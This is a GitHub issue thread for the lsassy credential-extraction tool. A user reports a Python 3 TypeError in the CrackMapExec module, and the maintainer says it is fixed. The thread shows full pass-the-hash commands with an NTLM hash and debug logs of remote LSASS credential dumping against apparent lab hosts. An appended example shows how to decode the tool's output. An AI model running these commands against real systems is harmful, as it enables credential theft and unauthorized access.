login-securite / lsassy

Extract credentials from lsass remotely
https://en.hackndo.com/remote-lsass-dump-passwords/
MIT License

Issue with lsassy Module on CrackMapExec 5.0.0dev #32

Closed 0rx1 closed 4 years ago

0rx1 commented 4 years ago
➜  ~ pipenv run crackmapexec --verbose smb /root/Desktop/Pentest/targets.txt -u 'Administrator' -H 'aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd' -d CEH -M lsassy -o METHOD=1 BLOODHOUND=true NEO4JPASS=toor
DEBUG Passed args:
{'clear_obfscripts': False,
 'content': False,
 'continue_on_success': False,
 'cred_id': [],
 'darrell': False,
 'depth': None,
 'disks': False,
 'domain': 'CEH',
 'exclude_dirs': '',
 'exec_method': None,
 'execute': None,
 'fail_limit': None,
 'force_ps32': False,
 'gen_relay_list': None,
 'gfail_limit': None,
 'groups': None,
 'hash': ['aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd'],
 'jitter': None,
 'list_modules': False,
 'local_auth': False,
 'local_groups': None,
 'loggedon_users': False,
 'lsa': False,
 'module': 'lsassy',
 'module_options': ['METHOD=1', 'BLOODHOUND=true', 'NEO4JPASS=toor'],
 'no_output': False,
 'ntds': None,
 'obfs': False,
 'only_files': False,
 'pass_pol': False,
 'password': [],
 'pattern': None,
 'port': 445,
 'protocol': 'smb',
 'ps_execute': None,
 'regex': None,
 'rid_brute': None,
 'sam': False,
 'server': 'https',
 'server_host': '0.0.0.0',
 'server_port': None,
 'sessions': False,
 'share': 'C$',
 'shares': False,
 'show_module_options': False,
 'spider': None,
 'spider_folder': '.',
 'target': ['/root/Desktop/Pentest/targets.txt'],
 'threads': 100,
 'timeout': None,
 'ufail_limit': None,
 'username': ['Administrator'],
 'users': None,
 'verbose': True,
 'wmi': None,
 'wmi_namespace': 'root\\cimv2'}
SMB         192.168.1.200   445    WIN12-SERVER     [*] Windows Server 2012 R2 Datacenter 9600 x64 (name:WIN12-SERVER) (domain:CEH) (signing:True) (SMBv1:True)
SMB         192.168.1.250   445    PC               [*] Windows 7 Professional 7600 x64 (name:PC) (domain:CEH) (signing:False) (SMBv1:True)
DEBUG add_credential(credtype=hash, domain=CEH, username=Administrator, password=aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd, groupid=None, pillaged_from=None) => None
SMB         192.168.1.200   445    WIN12-SERVER     [+] CEH\Administrator aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd (Pwn3d!)
DEBUG [#0000]  C: <RESOLVE> Address(host='127.0.0.1', port=7687)
DEBUG [#0000]  C: <OPEN> ('127.0.0.1', 7687)
DEBUG [#E306]  C: <SECURE> 127.0.0.1
DEBUG [#E306]  C: <MAGIC> 0x6060B017
DEBUG [#E306]  C: <HANDSHAKE> 0x00000003 0x00000002 0x00000001 0x00000000
DEBUG [#E306]  S: <HANDSHAKE> 0x00000003
DEBUG [#E306]  C: HELLO {'user_agent': 'neobolt/1.7.16 Python/3.7.6-final-0 (linux)', 'scheme': 'basic', 'principal': 'neo4j', 'credentials': '*******'}
DEBUG [#E306]  S: SUCCESS {'server': 'Neo4j/3.5.3', 'connection_id': 'bolt-5'}
DEBUG [#E306]  C: BEGIN {}
DEBUG [#E306]  C: RUN 'MATCH (c:Computer {name:"WIN12-SERVER.CEH"}) SET c.owned=True RETURN c.name AS name' {} {}
DEBUG [#E306]  C: PULL_ALL
DEBUG [#E306]  S: SUCCESS {}
DEBUG [#E306]  S: SUCCESS {'t_first': 1, 'fields': ['name']}
DEBUG [#E306]  S: SUCCESS {'type': 'rw', 't_last': 0}
DEBUG [#E306]  C: COMMIT
DEBUG [#E306]  S: SUCCESS {'bookmark': 'neo4j:bookmark:v1:tx340'}
LSASSY      192.168.1.200   445    WIN12-SERVER     [-] Node WIN12-SERVER.CEH does not appear to be in Neo4J database. Have you imported correct data ?
DEBUG [#E306]  C: GOODBYE
DEBUG [#E306]  C: <CLOSE>
LSASSY      192.168.1.200   445    WIN12-SERVER     [*] Parsing lsass with lsassy
DEBUG Lsassy command : lsassy --format json -d 'CEH' -u 'Administrator' -p '' -H 'aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd' 192.168.1.200 -vv  --method 1
DEBUG add_credential(credtype=hash, domain=CEH, username=Administrator, password=aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd, groupid=None, pillaged_from=None) => None
SMB         192.168.1.250   445    PC               [+] CEH\Administrator aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd (Pwn3d!)
DEBUG [#0000]  C: <RESOLVE> Address(host='127.0.0.1', port=7687)
DEBUG [#0000]  C: <OPEN> ('127.0.0.1', 7687)
DEBUG [#E30A]  C: <SECURE> 127.0.0.1
DEBUG [#E30A]  C: <MAGIC> 0x6060B017
DEBUG [#E30A]  C: <HANDSHAKE> 0x00000003 0x00000002 0x00000001 0x00000000
DEBUG [#E30A]  S: <HANDSHAKE> 0x00000003
DEBUG [#E30A]  C: HELLO {'user_agent': 'neobolt/1.7.16 Python/3.7.6-final-0 (linux)', 'scheme': 'basic', 'principal': 'neo4j', 'credentials': '*******'}
DEBUG [#E30A]  S: SUCCESS {'server': 'Neo4j/3.5.3', 'connection_id': 'bolt-6'}
DEBUG [#E30A]  C: BEGIN {}
DEBUG [#E30A]  C: RUN 'MATCH (c:Computer {name:"PC.CEH"}) SET c.owned=True RETURN c.name AS name' {} {}
DEBUG [#E30A]  C: PULL_ALL
DEBUG [#E30A]  S: SUCCESS {}
DEBUG [#E30A]  S: SUCCESS {'t_first': 1, 'fields': ['name']}
DEBUG [#E30A]  S: SUCCESS {'type': 'rw', 't_last': 0}
DEBUG [#E30A]  C: COMMIT
DEBUG [#E30A]  S: SUCCESS {'bookmark': 'neo4j:bookmark:v1:tx340'}
LSASSY      192.168.1.250   445    PC               [-] Node PC.CEH does not appear to be in Neo4J database. Have you imported correct data ?
DEBUG [#E30A]  C: GOODBYE
DEBUG [#E30A]  C: <CLOSE>
LSASSY      192.168.1.250   445    PC               [*] Parsing lsass with lsassy
DEBUG Lsassy command : lsassy --format json -d 'CEH' -u 'Administrator' -p '' -H 'aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd' 192.168.1.250 -vv  --method 1
DEBUG ----- lsassy output -----
Traceback (most recent call last):
  File "src/gevent/greenlet.py", line 766, in gevent._greenlet.Greenlet.run
  File "/usr/lib/python3/dist-packages/cme/protocols/smb.py", line 110, in __init__
    connection.__init__(self, args, db, host)
  File "/usr/lib/python3/dist-packages/cme/connection.py", line 42, in __init__
    self.proto_flow()
  File "/usr/lib/python3/dist-packages/cme/connection.py", line 76, in proto_flow
    self.call_modules()
  File "/usr/lib/python3/dist-packages/cme/connection.py", line 106, in call_modules
    self.module.on_admin_login(context, self)
  File "/usr/lib/python3/dist-packages/cme/modules/lsassy.py", line 120, in on_admin_login
    for line in out.split("\n"):
TypeError: a bytes-like object is required, not 'str'
2020-02-09T14:27:07Z <Greenlet at 0x7f2a2c5c5dd0: smb(Namespace(clear_obfscripts=False, content=False, c, <protocol.database object at 0x7f2a2c3a0e10>, '192.168.1.200')> failed with TypeError

DEBUG ----- lsassy output -----
Traceback (most recent call last):
  File "src/gevent/greenlet.py", line 766, in gevent._greenlet.Greenlet.run
  File "/usr/lib/python3/dist-packages/cme/protocols/smb.py", line 110, in __init__
    connection.__init__(self, args, db, host)
  File "/usr/lib/python3/dist-packages/cme/connection.py", line 42, in __init__
    self.proto_flow()
  File "/usr/lib/python3/dist-packages/cme/connection.py", line 76, in proto_flow
    self.call_modules()
  File "/usr/lib/python3/dist-packages/cme/connection.py", line 106, in call_modules
    self.module.on_admin_login(context, self)
  File "/usr/lib/python3/dist-packages/cme/modules/lsassy.py", line 120, in on_admin_login
    for line in out.split("\n"):
TypeError: a bytes-like object is required, not 'str'
2020-02-09T14:27:12Z <Greenlet at 0x7f2a2d2505f0: smb(Namespace(clear_obfscripts=False, content=False, c, <protocol.database object at 0x7f2a2c3a0e10>, '192.168.1.250')> failed with TypeError
Hackndo commented 4 years ago

I'll update CME module so it works with python3

Hackndo commented 4 years ago

Fixed in lsassy 2.0.3. Use lsassy3.py in CME module for CME5 and above.
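
The traceback above shows a `str` separator applied to `bytes` output, a pattern that worked under Python 2 and raises `TypeError` under Python 3. The following is an added example, not part of the thread and not the lsassy or CrackMapExec code: it reproduces the failure with a constructed child process and shows one way to decode output before splitting. The names `run_child`, `to_lines` and `first_json` are hypothetical.

```python
import json
import subprocess
import sys

# Constructed stand-in for an external tool that prints a JSON line and a log line.
CHILD = 'import json; print(json.dumps({"status": "ok", "items": 2})); print("done")'


def run_child():
    """Return the child's raw stdout; in Python 3 this is bytes, not str."""
    return subprocess.run([sys.executable, "-c", CHILD], capture_output=True, check=True).stdout


def split_like_python2(out):
    """The pattern from the traceback: a str separator applied to bytes output."""
    return out.split("\n")


def to_lines(out, encoding="utf-8"):
    """Accept bytes or str, decode once at the boundary, split on any newline style."""
    if isinstance(out, (bytes, bytearray)):
        out = bytes(out).decode(encoding, errors="replace")
    return [line for line in out.splitlines() if line.strip()]


def first_json(lines):
    """Return the first line that parses as a JSON object, else None."""
    for line in lines:
        try:
            obj = json.loads(line)
        except ValueError:
            continue
        if isinstance(obj, dict):
            return obj
    return None


def demo():
    raw = run_child()
    try:
        split_like_python2(raw)
        error = None
    except TypeError as exc:
        error = str(exc)
    return error, first_json(to_lines(raw))


if __name__ == "__main__":
    print(demo())
```
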